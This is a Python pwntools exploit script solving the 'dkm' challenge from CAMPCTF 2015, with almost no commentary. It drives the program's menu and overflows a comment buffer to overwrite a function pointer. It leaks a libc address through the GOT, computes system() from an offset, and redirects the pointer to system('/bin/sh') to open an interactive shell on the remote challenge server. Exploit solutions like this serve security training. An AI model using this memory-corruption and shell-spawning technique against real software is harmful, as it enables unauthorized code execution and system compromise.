CAMPCTF 2015 dkm

#!/usr/bin/env python

from pwn import *

context.arch = 'amd64'

elf = ELF('dkm.elf')

puts = elf.got['__libc_start_main']

#r = remote("localhost", 5555)

r = remote("challs.campctf.ccc.ac", 10102)

r.recvuntil('> ')

def send_menu(r, s):

r.send(s+'\n')

print r.recvuntil('> ')

send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0') # number of ssid

send_menu(r, 'no comment')

send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '2')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')

send_menu(r, '2')

send_menu(r, '1')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, 'no comment')

send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

libc_start_addr = 0

SYSTEM_OFFSET = 0x23a80 # libc_start - system. brute force this offset!

show_with_wifi = 0x4009F0

# stage1> leak got

comment = 'A'*0x310

comment += pack(0) # latitude

comment += pack(0) # longitude

comment += pack(show_with_wifi) # show with wifi

comment += pack(0xdeadbeef) # edit

comment += pack(puts) # &got.puts

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

leak = r.recvuntil('> ')

print leak

leak = leak.split('SSID: ')[1]

libc_start_addr = int(leak[:6][::-1].encode('hex'), 16)

system_addr = libc_start_addr + SYSTEM_OFFSET

print 'libc_start at -{0}-'.format(hex(libc_start_addr))

print 'system at -{0}-'.format(hex(system_addr))

# stage2> jmp to system

send_menu(r, '4')

send_menu(r, '0')

send_menu(r, '3')

send_menu(r, '0')

send_menu(r, '0')

send_menu(r, '0')

comment = 'A'*0x310

comment += '/bin/sh\0' # latitute -> "/bin/sh"

comment += pack(0) # longitude

comment += pack(system_addr) # chage show to system

comment += pack(0xdeadbeef) # edit

comment += pack(0)

r.send( comment + '\n' )

print r.recvuntil('> ')

r.send('1\n')

r.interactive()